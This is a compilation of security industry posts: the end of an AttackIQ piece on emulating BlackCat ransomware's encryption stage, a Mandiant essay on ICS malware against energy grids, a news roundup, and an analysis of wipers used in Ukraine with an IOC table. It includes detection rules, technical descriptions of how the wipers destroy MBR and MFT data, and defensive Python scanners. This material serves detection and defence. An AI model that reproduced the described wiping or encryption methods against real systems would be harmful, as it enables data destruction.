Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS (“dir” AND “>”)
Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.
9b. Mitigation Policies
Although these are benign Windows commands, they can be used maliciously if threat actors have compromised an account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to only the administrative users who need them.
Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.
Scenario 10: Data Encrypted for Impact (T1486): In our last step of the attack graph, we mimic BlackCat’s encryption method implementing 128-bit AES-NI in CTR mode if supported by the host hardware and falling back to ChaCha20 if not. In addition to the specific encryption algorithm, we also emulate parts of the unique encryption process used by BlackCat.
One of these steps is the use of a temporary checkpoint file written to disk that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.
Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.
We’ve also taken care to emulate the structure of the file after encryption including an encrypted block of JSON that contains the private key and other metadata required to decrypt the file.
10a. Detection Process
A detection rule could be written to catch the checkpoint file written to disk during the encryption process:
FileName starts_with “checkpoints-”
In addition, the BlackCat ransomware group searches for the following extensions to encrypt:
.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu
Excessive file modifications to a variety of these file extensions within a very short time window would be an indicator of this impact activity occurring in your environment.
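The two signals named in 10a, the “checkpoints-” marker and a burst of modifications across many extensions, as a streaming detector over file events. This is an added example, not AttackIQ code: the event format, process names, paths and the window thresholds are constructed here; only the “checkpoints-” prefix comes from the analysis above. The compile-job sample shows why the detector counts distinct extensions and not just volume.

```python
"""Two signals for BlackCat's encryption stage from file events (scenario 10a).

Added example, not AttackIQ code. The event format, process names, paths and
the window thresholds are constructed for this example; the "checkpoints-"
prefix comes from the analysis above.
"""
import ntpath
from collections import defaultdict, deque
from dataclasses import dataclass

CHECKPOINT_PREFIX = "checkpoints-"

# Constructed thresholds: tune against your own file-activity baseline.
WINDOW_SECONDS = 10
MIN_MODIFICATIONS = 50       # modifications by one process inside the window
MIN_DISTINCT_EXTENSIONS = 5  # ransomware touches many types; a build job touches one


@dataclass(frozen=True)
class FileEvent:
    ts: float      # seconds since an arbitrary epoch
    process: str   # image name of the writing process
    action: str    # "create", "modify" or "delete"
    path: str


class EncryptionDetector:
    """Feed events in time order; each call returns an alert string or None."""

    def __init__(self):
        self.recent = defaultdict(deque)  # process -> deque of (ts, extension)
        self.raised = set()               # (process, signal) pairs already alerted

    def _once(self, process, signal, text):
        if (process, signal) in self.raised:
            return None
        self.raised.add((process, signal))
        return text

    def feed(self, ev: FileEvent):
        name = ntpath.basename(ev.path)
        # Signal 1: the per-file position marker, "checkpoints-" + original file name.
        if ev.action == "create" and name.startswith(CHECKPOINT_PREFIX):
            target = name[len(CHECKPOINT_PREFIX):]
            return self._once(ev.process, "checkpoint",
                              "checkpoint marker for %s written by %s" % (target, ev.process))
        if ev.action != "modify":
            return None
        # Signal 2: many modifications across many extensions in a short window.
        window = self.recent[ev.process]
        window.append((ev.ts, ntpath.splitext(name)[1].lower()))
        while window and window[0][0] < ev.ts - WINDOW_SECONDS:
            window.popleft()
        extensions = {ext for _, ext in window}
        if len(window) >= MIN_MODIFICATIONS and len(extensions) >= MIN_DISTINCT_EXTENSIONS:
            return self._once(ev.process, "burst",
                              "%s modified %d files across %d extensions within %ds"
                              % (ev.process, len(window), len(extensions), WINDOW_SECONDS))
        return None


def run(events) -> list[str]:
    detector = EncryptionDetector()
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        alert = detector.feed(ev)
        if alert:
            alerts.append(alert)
    return alerts


def sample_events() -> list[FileEvent]:
    """Constructed activity: an encryption run, a compile job and a user editing documents."""
    events = []
    # Encryption run: marker created, file rewritten, marker removed; 60 files in about 3 seconds.
    exts = (".docx", ".xlsx", ".pdf", ".jpg", ".sql", ".bak")
    for i in range(60):
        path = r"C:\Shares\Finance\file%02d%s" % (i, exts[i % len(exts)])
        marker = ntpath.join(ntpath.dirname(path), CHECKPOINT_PREFIX + ntpath.basename(path))
        t = 100.0 + i * 0.05
        events += [FileEvent(t, "BlackCat.exe", "create", marker),
                   FileEvent(t + 0.01, "BlackCat.exe", "modify", path),
                   FileEvent(t + 0.02, "BlackCat.exe", "delete", marker)]
    # Compile job: 80 object files in 8 seconds, one extension. High volume, not ransomware.
    for i in range(80):
        events.append(FileEvent(200.0 + i * 0.1, "msbuild.exe", "modify", r"C:\src\obj\unit%02d.obj" % i))
    # A user saving a few documents over a couple of minutes.
    for i in range(3):
        events.append(FileEvent(300.0 + i * 30, "winword.exe", "modify", r"C:\Users\alice\Documents\notes%d.docx" % i))
    return events


if __name__ == "__main__":
    for alert in run(sample_events()):
        print(alert)
```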
10b. Mitigation Policies
MITRE mitigation Recommendations for T1486:
M1040
M1053
In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.
The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.
Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.
And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.
Shortly before Christmas in 2015 the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017, the same group used ransomware to shut down servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope of the threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s activity during the current crisis in Ukraine.
Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.
Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.
The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.
Exploration of energy sector significance
It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.
This is because of the critical role energy plays in several key areas: internal stability through essential services; economic health, given the huge role oil and gas play in many economies; the compliance that can be achieved when crucial suppliers deny or fail to deliver fuel; and, finally, a rapidly digitizing industry at the forefront of competition between the world’s great powers, making it fertile ground for testing cyber capabilities in a way that sends a quick and direct message.
Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.
This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.
In past wars the bombing of oil and gas facilities was a priority effort; in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, decreasing the risk to the attacker and increasing the speed and scale of destruction.
Discussion of malware functions and effects
One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment used across multiple industries. The apparent goal was to interact with that equipment in such a way as to disable safety features, similar to Triton discussed above.[5]
Future Scenarios
Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.
That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.
Mitigation
From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.
First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.
Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.
Third and finally, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.
Conclusion
Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.
Jason Atwell
About the Author:
Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.
References
[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108
[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html
[3] https://home.treasury.gov/news/press-releases/sm1162
[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108
[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool
This article was originally published on Power Engineering.
An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….
For links to all of today’s stories check out our CyberWire daily news briefing:
https://thecyberwire.com/newsletters/daily-briefing/11/86
Selected reading.
Update on cyber activity in Eastern Europe (Google)
Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)
Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)
SolarWinds hackers set up phony media outlets to trick targets (CyberScoop)
SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future)
Experts discover a Chinese-APT cyber espionage operation targeting US organizations (VentureBeat)
Operation CuckooBees: Cybereason Uncovers Massive Chinese Intellectual Property Theft Operation (Cybereason Nocturnus)
Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques (Cybereason)
Chinese hackers cast wide net for trade secrets in US, Europe and Asia, researchers say (CNN)
Researchers tie ransomware families to North Korean cyber-army (The Record by Recorded Future)
The Hermit Kingdom’s Ransomware Play (Trellix)
New espionage group is targeting corporate M&A (TechCrunch)
Cyberespionage Group Targeting M&A, Corporate Transactions Personnel (SecurityWeek)
UNC3524: Eye Spy on Your Email (Mandiant)
Yokogawa CENTUM and ProSafe-RS (CISA)
Cops ignored call to nearby robbery, preferring to hunt Pokémon (Graham Cluley)
Executive summary
2022 has seen an increase in the number of wiper variants targeting Ukrainian entities.
This blog post explains how wipers work and what makes them so effective, and provides a short overview of the most recent samples that have appeared in the Eastern European geopolitical conflict.
How does wiper malware work?
A wiper's main objective is to destroy data on any storage device and make the information unavailable (T1485). There are two ways of removing files: logical and physical.
Logical file removal is the most common way of erasing a file; users perform it daily when a file is sent to (and emptied from) the Recycle Bin, or when it is removed from the command line or terminal with del/rm. This action deletes the pointer to the file but not the file data, so the data remains recoverable with forensic tools as long as the operating system does not write another file to the same physical location.
However, malware wipers aim to make the data irrecoverable, so they tend to remove the data at the physical level of the disk. The most effective way to remove a file is to overwrite its physical location with other data (usually a repeated byte such as 0xFF). This process usually involves writing several gigabytes (or terabytes) of data to disk and can be time consuming. For this reason, in addition to destroying the data, many wipers first destroy two special structures on the system:
The Master Boot Record (MBR), which is used during the boot process to identify where the operating system is stored on the disk. Once the MBR is overwritten, the boot process fails, making the files inaccessible unless forensic methods are used.
The Master File Table (MFT), which is exclusive to NTFS file systems, contains the physical location of each file on the drive as well as its logical and physical size and any associated metadata. If large files need to be stored on the drive and cannot use consecutive blocks, they have to be fragmented across the disk, and the MFT records where each fragment is stored. Removing the MFT means forensic tools are needed to recover even small files, and it essentially prevents recovery of fragmented files, since the link between the fragments is lost.
The main difference between wipers and ransomware is that it’s impossible to retrieve the impacted information after a wiper attack. Attackers using wipers do not usually target financial reward but intend to disrupt the victim’s operations as much as possible. Ransomware operators aim to get a payment in exchange for the key to decrypt the user’s data.
With both wiper and ransomware attacks, the victim depends on their backup system to recover after an attack. However, some wiper attacks also carry ransom notes requesting a payment to recover the data. It is important that the victim properly identifies the attack they have suffered, or they may pay the ransom without any chance of retrieving the lost data.
In the last month and a half, since the war started in Eastern Europe, several wipers have been used in parallel with DDoS attacks (T1499) to keep financial institutions and government organizations, mainly Ukrainian, inaccessible for extended periods of time. Some of the wipers observed in this timeframe have been: WhisperKill, HermeticWiper, IsaacWiper, CaddyWiper, DoubleZero Wiper and AcidRain.
Most recent wiper examples
WhisperKill
On January 14, 2022, the Ukrainian government experienced a coordinated attack on 22 of its government agencies, defacing their websites. Almost all the compromised websites were developed by the same Ukrainian IT company, Kitsoft, and all of them were built on OctoberCMS. Therefore, the attack vector was most probably a supply chain attack on the IT provider, or the exploitation of an OctoberCMS vulnerability, combined with exploitation of the Log4Shell vulnerability (T1190).
Figure 1. Example of defaced Ukrainian government website.
In addition to the website defacement, the Microsoft Threat Intelligence Center (MSTIC) reported destructive malware targeting Ukrainian organizations, consisting of two samples. Microsoft named the malware WhisperGate, while other security companies used WhisperGate for the downloader and WhisperKill for the actual wiper, which was considered a component of WhisperGate.
The identified files were:
Stage 1 replaces the Master Boot Record (MBR) with a ransom note when the system is powered down, rendering the machine unbootable from that point on. When booted up, the system displays the message shown in Figure 2. Despite the ransom request, the data will not be recoverable, since everything WhisperKill does is intended to destroy data, not encrypt it. In this case, the wallet is most probably a decoy intended to mislead attribution efforts.
Figure 2. Ransom note obtained by MSTIC.
Stage 2 attempts to download the next-stage malware (T1102.003) from the Discord app; if unsuccessful, it sleeps and tries again. The payload downloaded from the messaging app destroys as much data as possible by overwriting certain file types with 0xCC for the first MB of each file, then renaming the file with a random four-byte extension. By selecting which file types to wipe and overwriting only the first MB of each, the attackers optimize the wiping process: no time is wasted on system files, and each file is only written to until it is unrecoverable before the malware moves on to the next one. Finally, the malware executes a command to delete itself from the system (T1070.004).
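The distinction drawn above matters for responders: a repeated-byte fill (the 0xFF mentioned earlier, or WhisperKill's 0xCC over the first MB) leaves a flat, single-value pattern, whereas ciphertext or a random-data overwrite leaves a uniform byte distribution. The following is an added example, not code from the original post, showing a small triage scanner that reads the first MB of each file and classifies it on that basis, so a ransom note can be weighed against what the files actually look like. The sample files, the thresholds and the file names are all constructed assumptions.

```python
"""Triage helper: tell a repeated-byte wipe from an encryption-style overwrite.

Added example, not code from the original post. The sample files are
constructed here; the thresholds are heuristics, not values from the post.
"""
import random
import tempfile
from collections import Counter
from pathlib import Path

FIRST_MB = 1024 * 1024   # WhisperKill-style wipers overwrite the first MB of each file


def classify_bytes(data: bytes) -> str:
    """Classify the leading bytes of a file.

    'wiped'     : one byte value dominates (repeated-byte fill such as 0xCC or 0xFF)
    'random'    : flat byte distribution, i.e. ciphertext or a random-data overwrite
                  (HermeticWiper/IsaacWiper-style random fills look the same as
                  ransomware output here, so this verdict alone does not settle
                  whether a ransom note is genuine)
    'intact'    : ordinary structured content
    'too-small' : not enough bytes for a reliable verdict
    """
    if len(data) < 256:
        return "too-small"
    counts = Counter(data)
    dominant_share = counts.most_common(1)[0][1] / len(data)
    if dominant_share >= 0.9:
        return "wiped"
    if len(counts) == 256 and dominant_share <= 0.02:
        return "random"
    return "intact"


def scan_tree(root: Path) -> dict:
    """Classify every regular file under root by its first MB."""
    verdicts = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            with path.open("rb") as fh:
                verdicts[path.relative_to(root).as_posix()] = classify_bytes(fh.read(FIRST_MB))
    return verdicts


def build_constructed_samples(root: Path) -> None:
    """Write three constructed files mimicking the states discussed in the post."""
    rng = random.Random(2022)                        # deterministic "random" fill
    (root / "report.docx").write_bytes(b"Quarterly figures: revenue up 4%.\n" * 4000)
    # WhisperKill-style: first MB replaced by 0xCC, then a random four-byte extension
    (root / "budget.xlsx.k9Qz").write_bytes(b"\xcc" * FIRST_MB + b"tail-of-original-file")
    # ransomware-style or random-fill wipe: the bytes carry no structure at all
    (root / "photo.jpg.locked").write_bytes(bytes(rng.getrandbits(8) for _ in range(64 * 1024)))


def demo() -> dict:
    """Build the constructed samples in a temp dir and return the verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_constructed_samples(root)
        return scan_tree(root)


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{verdict:10s} {name}")
```

Point `scan_tree` at a mounted image or a recovered share rather than a live victim disk; reading only the first MB keeps the pass fast on large trees, and a "wiped" verdict across a file population is strong evidence that paying would recover nothing.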
HermeticWiper
A month later, on February 23rd, 2022, ESET Research reported a new wiper being used against hundreds of Ukrainian systems. The wiper takes its name from the stolen code-signing certificate (T1588.003), issued to "Hermetica Digital Ltd", that it used to bypass security controls. According to a Reuters article, the certificate could also have been obtained by impersonating the company and requesting a new certificate from scratch.
Figure 3. Hermetica Digital Ltd certificate.
The attackers have been seen using several methods to distribute the wiper through the domain, like: domain Group Policy Object (GPO) (T1484.001), Impacket or SMB (T1021.002) and WMI (T1047) with an additional worm component named HermeticWizard.
The wiper component first installs the payload as a service (T1569.002) under C:\Windows\system32\Drivers. Afterwards, the service corrupts the first 512 bytes of the MBR of all physical drives and then enumerates their partitions. Before attempting to overwrite as much data as it can, it deletes key files in the partition, such as the MFT, $Bitmap, $LogFile, the NTUSER registry hive (T1112) and the event logs (T1070.001).
On top of deleting key file system structures, it also performs a drive fragmentation (breaking up files and segregating them in the drive to optimize the system’s performance). The combination of the file fragmentation and the deletion of the MFT makes file recovery difficult, since files will be scattered through the drive in small parts – without any guidance as to where each part is located.
Finally, the malware writes randomized contents into all occupied sectors in the partition in an attempt to remove all potential hope of recovering any data with forensic tools or procedures.
IsaacWiper
A day after the initial destructive attack with HermeticWiper, on February 24th, 2022, a new wiper was used against the Ukrainian government, as reported by ESET, without any significant similarities to the HermeticWiper used the day before.
IsaacWiper identifies all physical drives that do not contain the operating system and locks their logical partitions, allowing only a single thread to access each of them. It then starts writing random data to the drives in chunks of 64 KB. There is a single thread per volume, which makes the wiping process very long.
Once the other physical drives, and the logical partitions that share a physical drive with the operating system's volume, have been wiped, this last volume is wiped by:
Erasing the MBR.
Overwriting all files with 64 KB chunks of random data with one thread.
Creating a new file on the C drive, which is filled with random data until it takes up all the space it can on the partition, overwriting the already-overwritten existing files. This is performed by a different thread, but it still takes a long time to write the full partition, since both concurrent threads are attempting to write random data across the full disk.
Figure 4. IsaacWiper strings.
When comparing IsaacWiper to WhisperKill, the attackers' priorities become clear. WhisperKill's creators prioritized speed and the number of affected files over ensuring the full drive is overwritten, since only 1 MB of each file was overwritten. IsaacWiper's creators, on the other hand, gave total priority to delivering the most effective wiper, no matter how long it takes to overwrite the full physical disk.
AcidRain
On the same day IsaacWiper was deployed, another wiper attacked Viasat KA-SAT modems in Ukraine; SentinelLABS named it AcidRain. This wiper was particularly aimed at modems, probably to disrupt Internet access from Ukraine. It showed similarities to VPNFilter, a botnet previously seen targeting modems. VPNFilter was used in 2018, targeting vulnerabilities in several common router brands: Linksys, MikroTik, NETGEAR, and TP-Link. Exploiting those vulnerabilities gave the attackers initial access to all types of networks, where the bot would search for Modbus traffic to identify infected systems with Industrial Control Systems (ICS).
The wiper used was an ELF MIPS binary targeting Viasat KA-SAT modems, which first overwrites any file outside the directories of a common *nix installation (bin, boot, dev, lib, proc, sbin, sys, usr, etc.) and then deletes data from /dev/.
CaddyWiper
The first version of CaddyWiper was discovered by ESET researchers on 2022-03-14, when it was used against a Ukrainian bank. This new wiper does not have any significant code similarities to previous wipers. The sample specifically sets an exclusion to avoid infecting Domain Controllers in the compromised environment. It then targets C:/Users and any additional attached drive up to letter Z:/ and zeroes all files present in those folders/drives. Finally, the extended information of the physical drives is destroyed, including the MBR and partition entries.
A variant of CaddyWiper was used again on 2022-04-08 at 14:58 against high-voltage electrical substations in Ukraine. This latest version of the wiper was delivered together with Industroyer2, an evolution of Industroyer, whose main function is to communicate with industrial equipment. In this case, the wiper was used to slow down recovery from the Industroyer2 attack and the regaining of control over the ICS consoles, as well as to cover the tracks of the attack. According to WeLiveSecurity, which has been cooperating with CERT-UA in this investigation, the Sandworm Team is behind this latest attack.
In this same attack on the Ukrainian energy station, other wiper samples for Linux and Solaris were observed by WeLiveSecurity. These wipers use the shred command if present; otherwise, they fall back to the basic dd or rm commands to wipe the system.
DoubleZero wiper
On March 22, 2022 CERT-UA reported a new wiper used against their infrastructure and enterprises. Named DoubleZero, the wiper was distributed as a ZIP file containing an obfuscated .NET program. The wiper’s routine sets a hardcoded list of system directories, which are skipped during an initial wiping targeting user files. Afterwards, the skipped system directories are targeted and finally the registry hives: HKEY_LOCAL_MACHINE (containing the hives Sam, Security, Software and System), HKEY_CURRENT_USER and HKEY_USERS.
There are two wiping methods, both of which zero out the selected file.
Figure 5. DoubleZero first wiping function.
Conclusion
As we have seen in the examples above, the main objective of the attackers behind wipers is to destroy all possible data and render systems unbootable (if possible), potentially requiring a full system restore if backups aren’t available. These malware attacks can be as disruptive as ransomware attacks, but wipers are arguably worse since there is no potential escape door of a payment to recover the data.
There are plenty of ways to wipe systems. We have looked at six different wiper samples observed targeting Ukrainian entities. These samples approach the attack in very different ways, and most of them finish faster than the time required to respond. For that reason, detection of wiper malware on its own is not effective: once a wiper is running on the system, it is already too late. The best approach against wipers is to prevent attacks by keeping systems up to date and by increasing cybersecurity awareness. In addition, the consequences can be mitigated by having periodic backup copies of key infrastructure available.
Associated indicators (IOCs)
The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the following OTX Pulses:
WhisperKill
HermeticWiper and IsaacWiper
AcidRain
CaddyWiper
DoubleZero
Please note, the pulses may include other activities related but out of the scope of the report.
TYPE    INDICATOR                                                         DESCRIPTION
SHA256  a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92  WhisperKill (stage1.exe)
SHA256  dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78  WhisperKill (stage2.exe)
SHA256  0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da  HermeticWiper
SHA256  1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591  HermeticWiper
SHA256  13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033  IsaacWiper
SHA256  9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a  AcidRain
SHA256  47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6  AcidRain
SHA256  Fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa  CaddyWiper
SHA256  7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87  Industroyer2
SHA256  3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe  DoubleZero
SHA256  30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a  DoubleZero
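To put the indicators above to use, the following added example (not code from the original post) hashes every file under a directory in chunks and reports any match against the SHA-256 values from the table. The indicator values are copied from the table on this page; the sample directory, the file names and the "constructed test indicator" used in the demo are assumptions made here so the scanner can be exercised offline.

```python
"""Match files on disk against the SHA-256 indicators listed above.

Added example, not code from the original post. The indicator values are
copied from the IOC table on this page; the sample files are constructed here.
"""
import hashlib
import tempfile
from pathlib import Path

# SHA-256 indicators from the table above (keys normalized to lowercase)
WIPER_IOCS = {
    "a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92": "WhisperKill (stage1.exe)",
    "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78": "WhisperKill (stage2.exe)",
    "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da": "HermeticWiper",
    "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591": "HermeticWiper",
    "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033": "IsaacWiper",
    "9b4dfaca873961174ba935fddaf696145afe7bbf5734509f95feb54f3584fd9a": "AcidRain",
    "47f521bd6be19f823bfd3a72d851d6f3440a6c4cc3d940190bdc9b6dd53a83d6": "AcidRain",
    "fc0e6f2effbfa287217b8930ab55b7a77bb86dbd923c0e8150551627138c9caa": "CaddyWiper",
    "7062403bccacc7c0b84d27987b204777f6078319c3f4caa361581825c1a94e87": "Industroyer2",
    "3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe": "DoubleZero",
    "30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a": "DoubleZero",
}


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def scan_tree(root: Path, iocs: dict = WIPER_IOCS) -> list:
    """Return (relative path, sha256, label) for every file whose hash is in iocs."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        digest = sha256_file(path)
        label = iocs.get(digest.lower())
        if label:
            hits.append((path.relative_to(root).as_posix(), digest, label))
    return hits


# Constructed indicator for the demo only: the well-known SHA-256 of an empty file.
EMPTY_FILE_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"


def demo() -> dict:
    """Scan a constructed tree against the published set and against a test set."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "logs").mkdir()
        (root / "logs" / "empty.log").write_bytes(b"")
        (root / "notes.txt").write_bytes(b"constructed benign content\n")
        return {
            "against_published": scan_tree(root),
            "against_test_set": scan_tree(root, {EMPTY_FILE_SHA256: "constructed test indicator"}),
        }


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits or "no matches")
```

Hash matching only catches the exact samples listed; a recompiled or repacked build produces a different digest, which is why the OTX pulses referenced above are worth pulling for the fuller, updated set.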
Mapped to MITRE ATT&CK
The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:
TA0001: Initial Access
T1190: Exploit Public-Facing Application
TA0002: Execution
T1047: Windows Management Instrumentation
T1569: System Services
T1569.002: Service Execution
TA0008: Lateral Movement
T1021: Remote Services
T1021.002: SMB/Windows Admin Shares
TA0005: Defense Evasion
T1070: Indicator Removal on Host
T1070.004: File Deletion
T1070.001: Clear Windows Event Logs
T1112: Modify Registry
T1484: Domain Policy Modification
T1484.001: Group Policy Modification
TA0011: Command and Control
T1102: Web Service
T1102.003: One-Way Communication
TA0040: Impact
T1485: Data Destruction
T1499: Endpoint Denial of Service
TA0042: Resource Development
T1588: Obtain Capabilities
T1588.003: Code Signing Certificates
This post was written with contributions from IBM Security’s Sameer Koranne and Elias Andre Carabaguiaz Gonzalez.
